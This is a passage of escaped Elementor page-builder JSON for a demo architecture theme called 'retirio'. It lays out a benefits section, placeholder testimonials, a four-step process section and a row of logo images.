left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"